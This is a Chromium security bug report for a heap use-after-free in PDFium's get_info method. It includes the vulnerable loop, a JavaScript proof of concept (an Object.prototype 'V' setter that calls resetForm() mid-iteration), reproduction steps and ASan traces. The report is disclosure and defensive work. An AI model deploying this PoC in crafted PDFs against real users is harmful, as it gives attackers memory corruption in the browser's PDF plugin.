VULNERABILITY DETAILS
This bug is a heap use-after-free in the CJS_Document::get_info() method of PDFium's fxjs/cjs_document.cpp (the PDF engine bundled in Chrome's PDF plugin).
The method contains the for loop shown below.
// This for loop iterates a CPDF_Dictionary. CPDF_Dictionary stores its entries in a
// std::map<ByteString, std::unique_ptr<CPDF_Object>> and exposes that map's iterators
// directly (see the __tree_const_iterator frames in the ASan report below).
for (const auto& it : *pDictionary) {
const ByteString& bsKey = it.first;
CPDF_Object* pValueObj = it.second.get();
WideString wsKey = WideString::FromUTF8(bsKey.AsStringView());
if (pValueObj->IsString() || pValueObj->IsName()) {
// PutObjectProperty() performs an ordinary JS property store (v8::Object::Set). If the
// document's script has installed a setter for this key on Object.prototype, V8 runs that
// setter synchronously here, i.e. attacker-controlled JavaScript executes while this loop
// still holds an iterator into the dictionary's std::map. A call back into the Document
// API that mutates the same dictionary (resetForm() -> CPDF_FormField::ResetField() ->
// CPDF_Dictionary::RemoveFor()) erases the map node the iterator points to, and the loop's
// next ++it reads the freed node (the heap-use-after-free reported below).
// NOTE(review): the dictionary must not be modified while this loop runs. Either snapshot
// the key/value pairs before calling into JS, or create the property with a
// define-own-property style API (which does not consult prototype-chain setters) rather
// than a plain set.
pRuntime->PutObjectProperty(
pObj, wsKey,
pRuntime->NewString(pValueObj->GetUnicodeText().AsStringView()));
.....
}
Contents of PDF file
--------------------
This PDF file has a text field named 'txt1'.
It also defines an Info dictionary (the document information dictionary that stores Author, CreationDate, etc.).
The file is crafted so that one and the same PDF object serves both as the dictionary of the 'txt1' text field and as the Info dictionary; iterating the Info dictionary therefore iterates the field dictionary.
So while CJS_Document::get_info iterates that dictionary, the JavaScript below re-enters PDFium through resetForm() and removes the entry with key "V" from the text field's dictionary (CPDF_FormField::ResetField -> CPDF_Dictionary::RemoveFor). Erasing that std::map node while the loop still holds an iterator to it invalidates the iterator; the loop's next increment reads the freed node.
The root cause is re-entrancy: native code calls into attacker-controlled script while holding an iterator into a container that the script can mutate.
Document Javascript Section
----------------------------
// PoC entry point; invoked from the timer at the bottom once the document is open.
function run()
{
// Keep a reference to the Document object: inside the setter below, `this` is the JS
// object receiving the property store, not the document.
var doc = this;
// Install an accessor for key "V" on Object.prototype. The object that the native
// get_info loop fills inherits from Object.prototype, so when the loop stores the "V"
// property (PutObjectProperty -> v8::Object::Set) this setter runs instead of a plain
// data property being created. "V" is hooked because the 'txt1' field dictionary, which
// is the same object as the Info dictionary, carries a "V" entry.
Object.prototype.__defineSetter__('V', function(){
// Re-enter PDFium while get_info is still iterating the dictionary: resetForm() ->
// CPDF_FormField::ResetField() -> CPDF_Dictionary::RemoveFor() erases the map node the
// native loop's iterator currently points to (see the "freed by" stack in the report).
doc.resetForm();
});
// Accessing this.info invokes the native property getter CJS_Document::get_info
// (JSPropGetter in the stack), which runs the vulnerable loop. The crash happens inside
// the getter, before the trailing call.
info = this.info();
}
// 3 s delay, presumably to let the document finish loading before the PoC runs.
app.setTimeOut('run()',3000);
VERSION
Chrome Version: [69.0.3497.100] + [stable]
[72.0.3580.0] + [TOT build]
Operating System: [Windows 10, Ubuntu 16.04]
REPRODUCTION CASE
1. Open Chrome
2. Navigate to the attached pdf_get_info.pdf so that it opens in the built-in PDF viewer (no further user interaction is needed).
About 3 seconds later (the app.setTimeOut delay in the document script) the PDF plugin process crashes; under ASan this is reported as a heap-use-after-free.
FOR CRASHES, PLEASE INCLUDE THE FOLLOWING ADDITIONAL INFORMATION
Type of crash: [PDF Plugin process]
Crash State: [Address Sanitizer output]
==1==ERROR: AddressSanitizer: heap-use-after-free on address 0x60400003d958 at pc 0x5603d63e8859 bp 0x7fffb18c67f0 sp 0x7fffb18c67e8
READ of size 8 at 0x60400003d958 thread T0 (chrome)
#0 0x5603d63e8858 in std::__1::__tree_end_node<std::__1::__tree_node_base<void*>*>* std::__1::__tree_next_iter<std::__1::__tree_end_node<std::__1::__tree_node_base<void*>*>*, std::__1::__tree_node_base<void*>*>(std::__1::__tree_node_base<void*>*) /chromium/src/out/asan/../../buildtools/third_party/libc++/trunk/include/__tree:185:14
#1 0x5603d63e8858 in std::__1::__tree_const_iterator<std::__1::__value_type<fxcrt::ByteString, std::__1::unique_ptr<CPDF_Object, std::__1::default_delete<CPDF_Object> > >, std::__1::__tree_node<std::__1::__value_type<fxcrt::ByteString, std::__1::unique_ptr<CPDF_Object, std::__1::default_delete<CPDF_Object> > >, void*>*, long>::operator++() /chromium/src/out/asan/../../buildtools/third_party/libc++/trunk/include/__tree:921:0
#2 0x5603d63e8858 in std::__1::__map_const_iterator<std::__1::__tree_const_iterator<std::__1::__value_type<fxcrt::ByteString, std::__1::unique_ptr<CPDF_Object, std::__1::default_delete<CPDF_Object> > >, std::__1::__tree_node<std::__1::__value_type<fxcrt::ByteString, std::__1::unique_ptr<CPDF_Object, std::__1::default_delete<CPDF_Object> > >, void*>*, long> >::operator++() /chromium/src/out/asan/../../buildtools/third_party/libc++/trunk/include/map:772:0
#3 0x5603d63e8858 in CJS_Document::get_info(CJS_Runtime*) /chromium/src/out/asan/../../third_party/pdfium/fxjs/cjs_document.cpp:744:0
#4 0x5603d64184e8 in void JSPropGetter<CJS_Document, &(CJS_Document::get_info(CJS_Runtime*))>(char const*, char const*, v8::Local<v8::String>, v8::PropertyCallbackInfo<v8::Value> const&) /chromium/src/out/asan/../../third_party/pdfium/fxjs/js_define.h:85:23
#5 0x5603d63fe96c in CJS_Document::get_info_static(v8::Local<v8::String>, v8::PropertyCallbackInfo<v8::Value> const&) /chromium/src/out/asan/../../third_party/pdfium/fxjs/cjs_document.h:51:3
#6 0x7fc103414a5d in v8::internal::PropertyCallbackArguments::BasicCallNamedGetterCallback(void (*)(v8::Local<v8::Name>, v8::PropertyCallbackInfo<v8::Value> const&), v8::internal::Handle<v8::internal::Name>, v8::internal::Handle<v8::internal::Object>, v8::internal::Handle<v8::internal::Object>) /chromium/src/out/asan/../../v8/src/api-arguments-inl.h:196:3
#7 0x7fc1034141bc in v8::internal::PropertyCallbackArguments::CallAccessorGetter(v8::internal::Handle<v8::internal::AccessorInfo>, v8::internal::Handle<v8::internal::Name>) /chromium/src/out/asan/../../v8/src/api-arguments-inl.h:328:10
#8 0x7fc1036ef56a in v8::internal::Object::GetPropertyWithAccessor(v8::internal::LookupIterator*) /chromium/src/out/asan/../../v8/src/objects.cc:1601:34
#9 0x7fc1036ed144 in v8::internal::Object::GetProperty(v8::internal::LookupIterator*, v8::internal::OnNonExistent) /chromium/src/out/asan/../../v8/src/objects.cc:1071:16
#10 0x7fc1033ca91f in v8::internal::LoadIC::Load(v8::internal::Handle<v8::internal::Object>, v8::internal::Handle<v8::internal::Name>) /chromium/src/out/asan/../../v8/src/ic/ic.cc:469:5
#11 0x7fc1033f1009 in v8::internal::__RT_impl_Runtime_LoadIC_Miss(v8::internal::Arguments, v8::internal::Isolate*) /chromium/src/out/asan/../../v8/src/ic/ic.cc:2174:5
#12 0x7fc1033f03fa in v8::internal::Runtime_LoadIC_Miss(int, v8::internal::Object**, v8::internal::Isolate*) /chromium/src/out/asan/../../v8/src/ic/ic.cc:2158:1
#13 0x7fc10474b194 in Builtins_CEntry_Return1_DontSaveFPRegs_ArgvOnStack_NoBuiltinExit embedded.cc:?
#14 0x7fc10474b194 in ?? ??:0
#15 0x7fc10481d1cc in Builtins_LdaNamedPropertyHandler embedded.cc:?
#16 0x7fc10481d1cc in ?? ??:0
#12 0x7ee03d60ab8d (<unknown module>)
#13 0x7ee03d60ab8d (<unknown module>)
#17 0x7fc104493222 in Builtins_JSEntryTrampoline embedded.cc:?
#18 0x7fc104493222 in ?? ??:0
#15 0x7ee03d6020dd (<unknown module>)
#19 0x7fc1031003cd in v8::internal::GeneratedCode<v8::internal::Object*, v8::internal::Object*, v8::internal::Object*, v8::internal::Object*, int, v8::internal::Object***>::Call(v8::internal::Object*, v8::internal::Object*, v8::internal::Object*, int, v8::internal::Object***) /chromium/src/out/asan/../../v8/src/simulator.h:113:12
#20 0x7fc1031003cd in v8::internal::(anonymous namespace)::Invoke(v8::internal::Isolate*, bool, v8::internal::Handle<v8::internal::Object>, v8::internal::Handle<v8::internal::Object>, int, v8::internal::Handle<v8::internal::Object>*, v8::internal::Handle<v8::internal::Object>, v8::internal::Execution::MessageHandling, v8::internal::Execution::Target) /chromium/src/out/asan/../../v8/src/execution.cc:154:0
#21 0x7fc1030fec0d in v8::internal::(anonymous namespace)::CallInternal(v8::internal::Isolate*, v8::internal::Handle<v8::internal::Object>, v8::internal::Handle<v8::internal::Object>, int, v8::internal::Handle<v8::internal::Object>*, v8::internal::Execution::MessageHandling, v8::internal::Execution::Target) /chromium/src/out/asan/../../v8/src/execution.cc:190:10
#22 0x7fc1030fe9e6 in v8::internal::Execution::Call(v8::internal::Isolate*, v8::internal::Handle<v8::internal::Object>, v8::internal::Handle<v8::internal::Object>, int, v8::internal::Handle<v8::internal::Object>*) /chromium/src/out/asan/../../v8/src/execution.cc:201:10
#23 0x7fc10222e1fe in v8::Script::Run(v8::Local<v8::Context>) /chromium/src/out/asan/../../v8/src/api.cc:2116:7
#24 0x5603d6349bbc in CFXJS_Engine::Execute(fxcrt::WideString const&) /chromium/src/out/asan/../../third_party/pdfium/fxjs/cfxjs_engine.cpp:540:25
#25 0x5603d65e04a2 in CJS_Runtime::ExecuteScript(fxcrt::WideString const&) /chromium/src/out/asan/../../third_party/pdfium/fxjs/cjs_runtime.cpp:176:10
#26 0x5603d649624e in CJS_EventContext::RunScript(fxcrt::WideString const&) /chromium/src/out/asan/../../third_party/pdfium/fxjs/cjs_event_context.cpp:53:23
#27 0x5603d637b7e7 in CJS_App::RunJsScript(CJS_Runtime*, fxcrt::WideString const&) /chromium/src/out/asan/../../third_party/pdfium/fxjs/cjs_app.cpp:430:13
#28 0x5603d637b511 in CJS_App::TimerProc(GlobalTimer*) /chromium/src/out/asan/../../third_party/pdfium/fxjs/cjs_app.cpp:417:5
...
0x60400003d958 is located 8 bytes inside of 48-byte region [0x60400003d950,0x60400003d980)
freed by thread T0 (chrome) here:
#0 0x5603ce6b12e2 in operator delete(void*) _asan_rtl_:3
#1 0x5603d586f1e3 in std::__1::__libcpp_deallocate(void*, unsigned long) /chromium/src/out/asan/../../buildtools/third_party/libc++/trunk/include/new:279:10
#2 0x5603d586f1e3 in std::__1::allocator<std::__1::__tree_node<std::__1::__value_type<fxcrt::ByteString, std::__1::unique_ptr<CPDF_Object, std::__1::default_delete<CPDF_Object> > >, void*> >::deallocate(std::__1::__tree_node<std::__1::__value_type<fxcrt::ByteString, std::__1::unique_ptr<CPDF_Object, std::__1::default_delete<CPDF_Object> > >, void*>*, unsigned long) /chromium/src/out/asan/../../buildtools/third_party/libc++/trunk/include/memory:1802:0
#3 0x5603d586f1e3 in std::__1::allocator_traits<std::__1::allocator<std::__1::__tree_node<std::__1::__value_type<fxcrt::ByteString, std::__1::unique_ptr<CPDF_Object, std::__1::default_delete<CPDF_Object> > >, void*> > >::deallocate(std::__1::allocator<std::__1::__tree_node<std::__1::__value_type<fxcrt::ByteString, std::__1::unique_ptr<CPDF_Object, std::__1::default_delete<CPDF_Object> > >, void*> >&, std::__1::__tree_node<std::__1::__value_type<fxcrt::ByteString, std::__1::unique_ptr<CPDF_Object, std::__1::default_delete<CPDF_Object> > >, void*>*, unsigned long) /chromium/src/out/asan/../../buildtools/third_party/libc++/trunk/include/memory:1556:0
#4 0x5603d586f1e3 in std::__1::__tree<std::__1::__value_type<fxcrt::ByteString, std::__1::unique_ptr<CPDF_Object, std::__1::default_delete<CPDF_Object> > >, std::__1::__map_value_compare<fxcrt::ByteString, std::__1::__value_type<fxcrt::ByteString, std::__1::unique_ptr<CPDF_Object, std::__1::default_delete<CPDF_Object> > >, std::__1::less<fxcrt::ByteString>, true>, std::__1::allocator<std::__1::__value_type<fxcrt::ByteString, std::__1::unique_ptr<CPDF_Object, std::__1::default_delete<CPDF_Object> > > > >::erase(std::__1::__tree_const_iterator<std::__1::__value_type<fxcrt::ByteString, std::__1::unique_ptr<CPDF_Object, std::__1::default_delete<CPDF_Object> > >, std::__1::__tree_node<std::__1::__value_type<fxcrt::ByteString, std::__1::unique_ptr<CPDF_Object, std::__1::default_delete<CPDF_Object> > >, void*>*, long>) /chromium/src/out/asan/../../buildtools/third_party/libc++/trunk/include/__tree:2370:0
#5 0x5603d5866751 in std::__1::map<fxcrt::ByteString, std::__1::unique_ptr<CPDF_Object, std::__1::default_delete<CPDF_Object> >, std::__1::less<fxcrt::ByteString>, std::__1::allocator<std::__1::pair<fxcrt::ByteString const, std::__1::unique_ptr<CPDF_Object, std::__1::default_delete<CPDF_Object> > > > >::erase(std::__1::__map_iterator<std::__1::__tree_iterator<std::__1::__value_type<fxcrt::ByteString, std::__1::unique_ptr<CPDF_Object, std::__1::default_delete<CPDF_Object> > >, std::__1::__tree_node<std::__1::__value_type<fxcrt::ByteString, std::__1::unique_ptr<CPDF_Object, std::__1::default_delete<CPDF_Object> > >, void*>*, long> >) /chromium/src/out/asan/../../buildtools/third_party/libc++/trunk/include/map:1194:56
#6 0x5603d5866751 in CPDF_Dictionary::RemoveFor(fxcrt::ByteString const&) /chromium/src/out/asan/../../third_party/pdfium/core/fpdfapi/parser/cpdf_dictionary.cpp:226:0
#7 0x5603d5a72e52 in CPDF_FormField::ResetField(NotificationOption) /chromium/src/out/asan/../../third_party/pdfium/core/fpdfdoc/cpdf_formfield.cpp:242:18
#8 0x5603d5a87bc3 in CPDF_InteractiveForm::ResetForm(NotificationOption) /chromium/src/out/asan/../../third_party/pdfium/core/fpdfdoc/cpdf_interactiveform.cpp:823:13
#9 0x5603d63e185d in CJS_Document::resetForm(CJS_Runtime*, std::__1::vector<v8::Local<v8::Value>, std::__1::allocator<v8::Local<v8::Value> > > const&) /chromium/src/out/asan/../../third_party/pdfium/fxjs/cjs_document.cpp:577:15
#10 0x5603d645e6fd in void JSMethod<CJS_Document, &(CJS_Document::resetForm(CJS_Runtime*, std::__1::vector<v8::Local<v8::Value>, std::__1::allocator<v8::Local<v8::Value> > > const&))>(char const*, char const*, v8::FunctionCallbackInfo<v8::Value> const&) /chromium/src/out/asan/../../third_party/pdfium/fxjs/js_define.h:135:23
#11 0x5603d64045a2 in CJS_Document::resetForm_static(v8::FunctionCallbackInfo<v8::Value> const&) /chromium/src/out/asan/../../third_party/pdfium/fxjs/cjs_document.h:108:3
#12 0x7fc10249ec50 in v8::internal::FunctionCallbackArguments::Call(v8::internal::CallHandlerInfo*) /chromium/src/out/asan/../../v8/src/api-arguments-inl.h:140:3
#13 0x7fc10249b262 in v8::internal::MaybeHandle<v8::internal::Object> v8::internal::(anonymous namespace)::HandleApiCallHelper<false>(v8::internal::Isolate*, v8::internal::Handle<v8::internal::HeapObject>, v8::internal::Handle<v8::internal::HeapObject>, v8::internal::Handle<v8::internal::FunctionTemplateInfo>, v8::internal::Handle<v8::internal::Object>, v8::internal::BuiltinArguments) /chromium/src/out/asan/../../v8/src/builtins/builtins-api.cc:109:36
#14 0x7fc102497870 in v8::internal::Builtin_Impl_HandleApiCall(v8::internal::BuiltinArguments, v8::internal::Isolate*) /chromium/src/out/asan/../../v8/src/builtins/builtins-api.cc:139:5
#15 0x7fc102496a16 in v8::internal::Builtin_HandleApiCall(int, v8::internal::Object**, v8::internal::Isolate*) /chromium/src/out/asan/../../v8/src/builtins/builtins-api.cc:127:1
#16 0x7fc10474b194 in Builtins_CEntry_Return1_DontSaveFPRegs_ArgvOnStack_NoBuiltinExit embedded.cc:?
#17 0x7fc10474b194 in ?? ??:0
#13 0x7ee03d60ab8d (<unknown module>)
#18 0x7fc104489965 in Builtins_ArgumentsAdaptorTrampoline embedded.cc:?
#19 0x7fc104489965 in ?? ??:0
#20 0x7fc104493222 in Builtins_JSEntryTrampoline embedded.cc:?
#21 0x7fc104493222 in ?? ??:0
#16 0x7ee03d6020dd (<unknown module>)
#22 0x7fc1031003cd in v8::internal::GeneratedCode<v8::internal::Object*, v8::internal::Object*, v8::internal::Object*, v8::internal::Object*, int, v8::internal::Object***>::Call(v8::internal::Object*, v8::internal::Object*, v8::internal::Object*, int, v8::internal::Object***) /chromium/src/out/asan/../../v8/src/simulator.h:113:12
#23 0x7fc1031003cd in v8::internal::(anonymous namespace)::Invoke(v8::internal::Isolate*, bool, v8::internal::Handle<v8::internal::Object>, v8::internal::Handle<v8::internal::Object>, int, v8::internal::Handle<v8::internal::Object>*, v8::internal::Handle<v8::internal::Object>, v8::internal::Execution::MessageHandling, v8::internal::Execution::Target) /chromium/src/out/asan/../../v8/src/execution.cc:154:0
#24 0x7fc1030fec0d in v8::internal::(anonymous namespace)::CallInternal(v8::internal::Isolate*, v8::internal::Handle<v8::internal::Object>, v8::internal::Handle<v8::internal::Object>, int, v8::internal::Handle<v8::internal::Object>*, v8::internal::Execution::MessageHandling, v8::internal::Execution::Target) /chromium/src/out/asan/../../v8/src/execution.cc:190:10
#25 0x7fc1030fe9e6 in v8::internal::Execution::Call(v8::internal::Isolate*, v8::internal::Handle<v8::internal::Object>, v8::internal::Handle<v8::internal::Object>, int, v8::internal::Handle<v8::internal::Object>*) /chromium/src/out/asan/../../v8/src/execution.cc:201:10
#26 0x7fc1036fbd53 in v8::internal::Object::SetPropertyWithDefinedSetter(v8::internal::Handle<v8::internal::Object>, v8::internal::Handle<v8::internal::JSReceiver>, v8::internal::Handle<v8::internal::Object>, v8::internal::ShouldThrow) /chromium/src/out/asan/../../v8/src/objects.cc:1779:3
#27 0x7fc1036fbd53 in v8::internal::Object::SetPropertyWithAccessor(v8::internal::LookupIterator*, v8::internal::Handle<v8::internal::Object>, v8::internal::ShouldThrow) /chromium/src/out/asan/../../v8/src/objects.cc:1739:0
#28 0x7fc10373972d in v8::internal::Object::SetPropertyInternal(v8::internal::LookupIterator*, v8::internal::Handle<v8::internal::Object>, v8::internal::LanguageMode, v8::internal::StoreOrigin, bool*) /chromium/src/out/asan/../../v8/src/objects.cc:5157:16
#29 0x7fc103738cb4 in v8::internal::Object::SetProperty(v8::internal::LookupIterator*, v8::internal::Handle<v8::internal::Object>, v8::internal::LanguageMode, v8::internal::StoreOrigin) /chromium/src/out/asan/../../v8/src/objects.cc:5212:9
#30 0x7fc103c59fa6 in v8::internal::Runtime::SetObjectProperty(v8::internal::Isolate*, v8::internal::Handle<v8::internal::Object>, v8::internal::Handle<v8::internal::Object>, v8::internal::Handle<v8::internal::Object>, v8::internal::LanguageMode, v8::internal::StoreOrigin) /chromium/src/out/asan/../../v8/src/runtime/runtime-object.cc:368:3
#31 0x7fc10226ba89 in v8::Object::Set(v8::Local<v8::Context>, v8::Local<v8::Value>, v8::Local<v8::Value>) /chromium/src/out/asan/../../v8/src/api.cc:4025:7
#32 0x5603d6337e14 in CFX_V8::PutObjectProperty(v8::Local<v8::Object>, fxcrt::WideString const&, v8::Local<v8::Value>) /chromium/src/out/asan/../../third_party/pdfium/fxjs/cfx_v8.cpp:52:9
#33 0x5603d63e8137 in CJS_Document::get_info(CJS_Runtime*) /chromium/src/out/asan/../../third_party/pdfium/fxjs/cjs_document.cpp:749:17
...
previously allocated by thread T0 (chrome) here:
#0 0x5603ce6b06a2 in operator new(unsigned long) _asan_rtl_:3
#1 0x5603d5870366 in std::__1::__libcpp_allocate(unsigned long, unsigned long) /chromium/src/out/asan/../../buildtools/third_party/libc++/trunk/include/new:259:10
#2 0x5603d5870366 in std::__1::allocator<std::__1::__tree_node<std::__1::__value_type<fxcrt::ByteString, std::__1::unique_ptr<CPDF_Object, std::__1::default_delete<CPDF_Object> > >, void*> >::allocate(unsigned long, void const*) /chromium/src/out/asan/../../buildtools/third_party/libc++/trunk/include/memory:1799:0
#3 0x5603d5870366 in std::__1::allocator_traits<std::__1::allocator<std::__1::__tree_node<std::__1::__value_type<fxcrt::ByteString, std::__1::unique_ptr<CPDF_Object, std::__1::default_delete<CPDF_Object> > >, void*> > >::allocate(std::__1::allocator<std::__1::__tree_node<std::__1::__value_type<fxcrt::ByteString, std::__1::unique_ptr<CPDF_Object, std::__1::default_delete<CPDF_Object> > >, void*> >&, unsigned long) /chromium/src/out/asan/../../buildtools/third_party/libc++/trunk/include/memory:1548:0
#4 0x5603d5870366 in std::__1::unique_ptr<std::__1::__tree_node<std::__1::__value_type<fxcrt::ByteString, std::__1::unique_ptr<CPDF_Object, std::__1::default_delete<CPDF_Object> > >, void*>, std::__1::__tree_node_destructor<std::__1::allocator<std::__1::__tree_node<std::__1::__value_type<fxcrt::ByteString, std::__1::unique_ptr<CPDF_Object, std::__1::default_delete<CPDF_Object> > >, void*> > > > std::__1::__tree<std::__1::__value_type<fxcrt::ByteString, std::__1::unique_ptr<CPDF_Object, std::__1::default_delete<CPDF_Object> > >, std::__1::__map_value_compare<fxcrt::ByteString, std::__1::__value_type<fxcrt::ByteString, std::__1::unique_ptr<CPDF_Object, std::__1::default_delete<CPDF_Object> > >, std::__1::less<fxcrt::ByteString>, true>, std::__1::allocator<std::__1::__value_type<fxcrt::ByteString, std::__1::unique_ptr<CPDF_Object, std::__1::default_delete<CPDF_Object> > > > >::__construct_node<std::__1::piecewise_construct_t const&, std::__1::tuple<fxcrt::ByteString&&>, std::__1::tuple<> >(std::__1::piecewise_construct_t const&, std::__1::tuple<fxcrt::ByteString&&>&&, std::__1::tuple<>&&) /chromium/src/out/asan/../../buildtools/third_party/libc++/trunk/include/__tree:2191:0
#5 0x5603d586f92b in std::__1::pair<std::__1::__tree_iterator<std::__1::__value_type<fxcrt::ByteString, std::__1::unique_ptr<CPDF_Object, std::__1::default_delete<CPDF_Object> > >, std::__1::__tree_node<std::__1::__value_type<fxcrt::ByteString, std::__1::unique_ptr<CPDF_Object, std::__1::default_delete<CPDF_Object> > >, void*>*, long>, bool> std::__1::__tree<std::__1::__value_type<fxcrt::ByteString, std::__1::unique_ptr<CPDF_Object, std::__1::default_delete<CPDF_Object> > >, std::__1::__map_value_compare<fxcrt::ByteString, std::__1::__value_type<fxcrt::ByteString, std::__1::unique_ptr<CPDF_Object, std::__1::default_delete<CPDF_Object> > >, std::__1::less<fxcrt::ByteString>, true>, std::__1::allocator<std::__1::__value_type<fxcrt::ByteString, std::__1::unique_ptr<CPDF_Object, std::__1::default_delete<CPDF_Object> > > > >::__emplace_unique_key_args<fxcrt::ByteString, std::__1::piecewise_construct_t const&, std::__1::tuple<fxcrt::ByteString&&>, std::__1::tuple<> >(fxcrt::ByteString const&, std::__1::piecewise_construct_t const&, std::__1::tuple<fxcrt::ByteString&&>&&, std::__1::tuple<>&&) /chromium/src/out/asan/../../buildtools/third_party/libc++/trunk/include/__tree:2137:29
#6 0x5603d5869b56 in std::__1::map<fxcrt::ByteString, std::__1::unique_ptr<CPDF_Object, std::__1::default_delete<CPDF_Object> >, std::__1::less<fxcrt::ByteString>, std::__1::allocator<std::__1::pair<fxcrt::ByteString const, std::__1::unique_ptr<CPDF_Object, std::__1::default_delete<CPDF_Object> > > > >::operator[](fxcrt::ByteString&&) /chromium/src/out/asan/../../buildtools/third_party/libc++/trunk/include/map:1329:20
#7 0x5603d58640cb in CPDF_Dictionary::SetFor(fxcrt::ByteString const&, std::__1::unique_ptr<CPDF_Object, std::__1::default_delete<CPDF_Object> >) /chromium/src/out/asan/../../third_party/pdfium/core/fpdfapi/parser/cpdf_dictionary.cpp:206:3
#8 0x5603d5962e19 in CPDF_SyntaxParser::GetObjectBodyInternal(CPDF_IndirectObjectHolder*, CPDF_SyntaxParser::ParseType) /chromium/src/out/asan/../../third_party/pdfium/core/fpdfapi/parser/cpdf_syntax_parser.cpp:514:16
#9 0x5603d59672bf in CPDF_SyntaxParser::GetIndirectObject(CPDF_IndirectObjectHolder*, CPDF_SyntaxParser::ParseType) /chromium/src/out/asan/../../third_party/pdfium/core/fpdfapi/parser/cpdf_syntax_parser.cpp:556:7
#10 0x5603d59111a9 in CPDF_Parser::ParseIndirectObjectAt(long, unsigned int) /chromium/src/out/asan/../../third_party/pdfium/core/fpdfapi/parser/cpdf_parser.cpp:921:28
#11 0x5603d5913644 in CPDF_Parser::ParseIndirectObject(unsigned int) /chromium/src/out/asan/../../third_party/pdfium/core/fpdfapi/parser/cpdf_parser.cpp:870:12
#12 0x5603d5872b4e in CPDF_Document::ParseIndirectObject(unsigned int) /chromium/src/out/asan/../../third_party/pdfium/core/fpdfapi/parser/cpdf_document.cpp:195:33
#13 0x5603d58b11c8 in CPDF_IndirectObjectHolder::GetOrParseIndirectObject(unsigned int) /chromium/src/out/asan/../../third_party/pdfium/core/fpdfapi/parser/cpdf_indirect_object_holder.cpp:50:42
#14 0x5603d5937771 in CPDF_Reference::GetDirect() /chromium/src/out/asan/../../third_party/pdfium/core/fpdfapi/parser/cpdf_reference.cpp:93:35
#15 0x5603d57d7ed3 in CPDF_Array::GetDirectObjectAt(unsigned long) /chromium/src/out/asan/../../third_party/pdfium/core/fpdfapi/parser/cpdf_array.cpp:106:24
#16 0x5603d57d86ac in CPDF_Array::GetDictAt(unsigned long) /chromium/src/out/asan/../../third_party/pdfium/core/fpdfapi/parser/cpdf_array.cpp:140:20
#17 0x5603d5a83f21 in CPDF_InteractiveForm::CPDF_InteractiveForm(CPDF_Document*) /chromium/src/out/asan/../../third_party/pdfium/core/fpdfdoc/cpdf_interactiveform.cpp:595:24
#18 0x5603d61b1dee in ReportUnsupportedFeatures(CPDF_Document*) /chromium/src/out/asan/../../third_party/pdfium/fpdfsdk/cpdfsdk_helpers.cpp:242:32
#19 0x5603e7cd7009 in (anonymous namespace)::LoadDocumentImpl(fxcrt::RetainPtr<IFX_SeekableReadStream> const&, char const*) /chromium/src/out/asan/../../third_party/pdfium/fpdfsdk/fpdf_view.cpp:156:3
#20 0x5603e7cd7a0e in FPDF_LoadCustomDocument /chromium/src/out/asan/../../third_party/pdfium/fpdfsdk/fpdf_view.cpp:282:10
#21 0x5603e7bdbfc9 in chrome_pdf::PDFiumDocument::LoadDocument(char const*) /chromium/src/out/asan/../../pdf/pdfium/pdfium_document.cc:100:23
#22 0x5603e7b9bfea in chrome_pdf::PDFiumEngine::TryLoadingDoc(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> > const&, bool*) /chromium/src/out/asan/../../pdf/pdfium/pdfium_engine.cc:2615:14
#23 0x5603e7b63625 in chrome_pdf::PDFiumEngine::LoadDocument() /chromium/src/out/asan/../../pdf/pdfium/pdfium_engine.cc:2588:7
#24 0x5603e7b65406 in chrome_pdf::PDFiumEngine::OnDocumentComplete() /chromium/src/out/asan/../../pdf/pdfium/pdfium_engine.cc:960:3
#25 0x5603e7be5ecc in chrome_pdf::DocumentLoaderImpl::ReadComplete() /chromium/src/out/asan/../../pdf/document_loader_impl.cc:407:14
#26 0x5603e7be63d7 in chrome_pdf::DocumentLoaderImpl::DidRead(int) /chromium/src/out/asan/../../pdf/document_loader_impl.cc:319:14
...
CREDIT INFORMATION
Reporter credit: [Anonymous]
Comment 1 by chamal.d...@gmail.com, Oct 14